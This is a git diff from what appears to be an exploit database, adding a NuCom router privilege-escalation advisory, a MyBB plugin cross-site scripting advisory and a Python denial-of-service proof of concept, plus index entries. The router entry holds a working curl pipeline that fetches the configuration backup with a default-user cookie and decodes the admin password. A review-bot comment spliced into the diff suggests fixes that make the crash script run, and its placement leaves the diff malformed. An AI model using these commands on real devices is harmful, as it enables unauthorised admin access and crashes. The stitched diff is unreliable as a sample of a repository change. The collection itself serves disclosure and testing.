diff --git a/exploits/hardware/webapps/49634.txt b/exploits/hardware/webapps/49634.txt
new file mode 100644
index 000000000..c09f207cf
--- /dev/null
+++ b/exploits/hardware/webapps/49634.txt
@@ -0,0 +1,61 @@
+# Exploit Title: NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation
+# Date: 01.03.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.nucom.es
+
+
+
+
+Vendor: NUEVAS COMUNICACIONES IBERIA, S.A.
+Product web page: https://www.nucom.es
+Affected version: 5.07.90_multi_NCM01
+ 5.07.89_multi_NCM01
+ 5.07.72_multi_NCM01
+
+Summary: The NC routers upgrades your network to the next
+generation of WiFi. With combined wireless speeds of up to
+1750 Mbps, the device provides better speeds and wireless
+range. Includes 2 FXS ports for any VoIP service. If you
+prefer a wired connection, the NC routers have gigabit
+ports to provide an incredibly fast, lag-free experience.
+3.0 ports allow you to power a robust home Internet network
+by sharing printers, flash storage, FTP servers, or media
+players.
+
+Desc: The application suffers from a privilege escalation
+vulnerability. The non-privileged default user (user:user)
+can elevate his/her privileges by sending a HTTP GET request
+to the configuration backup endpoint and disclose the http
+super password (admin credentials) in Base64 encoded value.
+Once authenticated as admin, an attacker will be granted
+access to the additional and privileged pages.
+
+Tested on: GoAhead-Webs
+ Tenda
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5629
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php
+
+
+01.03.2021
+
+--
+
+
+lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \
+> curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \
+> -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \
+> grep -oP '(?<=http_supper_passwd=).*' | \
+> base64 -d 2>/dev/null | \
+> xargs echo -n ; \
+> echo -e '\n-----------\n'
+The admin password is: 
+MammaMia123
+-----------
+
+lqwrm@metalgear:~/prive$
\ No newline at end of file
diff --git a/exploits/php/webapps/49635.txt b/exploits/php/webapps/49635.txt
new file mode 100644
index 000000000..0ce124b3d
--- /dev/null
+++ b/exploits/php/webapps/49635.txt
@@ -0,0 +1,19 @@
+# Exploit Title: MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting
+# Date: 1/30/2021
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=1220
+# Version: 1.8.22
+# Tested on: Windows 10
+# CVE: CVE-2021-28115
+
+1. Description:
+This plugin adds a feedback system to your forum. Edit feedback button is vulnerable to XSS.
+
+2. Proof of Concept:
+
+- Go to a user profile
+- Add feedback and leave the following payload as comment ">
+- View the feedback feedback.php?uid=2
+- When clicking Edit payload will execute
\ No newline at end of file
diff --git a/exploits/windows/dos/49638.py b/exploits/windows/dos/49638.py
new file mode 100755
index 000000000..8e18e5930
--- /dev/null
+++ b/exploits/windows/dos/49638.py
@@ -0,0 +1,29 @@
+# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
+# Exploit Author : Enes Özeser
+# Exploit Date: 2021-02-28
+# Vendor Homepage : https://www.nsauditor.com/
+# Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe
+# Version: 1.6.4.0
+# Tested on: Windows 10
+
+# Steps:
+1- Run the python script. (payload.py)
+2- Open payload.txt and copy content to clipboard.
+3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'.
+4- Register -> Enter Registeration Code
+5- Paste clipboard into the "Key" or "Name".
+6- Click on OK.
+7- Crashed.
+
+---> payload.py <--
+
+#!/usr/bin/env python
+buffer = "\x41" * 300
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print "File created!"
+except:
+ print "File cannot be created!"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9eee078a1..0c2d6f6a4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
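Review bot: The `try` block at the bottom of 49638.py ends in a bare `except:` that swallows every error, so a reader who cannot get payload.txt written never learns whether it was a permission problem, a read-only directory or something else entirely. The `print "..."` statements are Python 2 syntax, and under the `#!/usr/bin/env python` shebang they are a SyntaxError wherever `python` resolves to Python 3, which is the common case on current systems; the `f.close()` is also skipped if `f.write` raises. Replacing the open/write/close trio with `with open("payload.txt", "w") as f: f.write(buffer)`, using `print("File created!")`, and narrowing the handler to `except OSError:` keeps the same behaviour while making the script run on either interpreter. The step list above the script is prose inside a .py file and will not parse either; it would be cleaner as `#` comments or moved to the header.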
@@ -6773,6 +6773,7 @@ id,file,description,date,author,type,platform,port
 49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
 49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
 49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
+49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -43820,3 +43821,5 @@ id,file,description,date,author,type,platform,port
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,
 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,
 49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple,
+49634,exploits/hardware/webapps/49634.txt,"NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation",2021-03-11,LiquidWorm,webapps,hardware,
+49635,exploits/php/webapps/49635.txt,"MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting",2021-03-11,0xB9,webapps,php,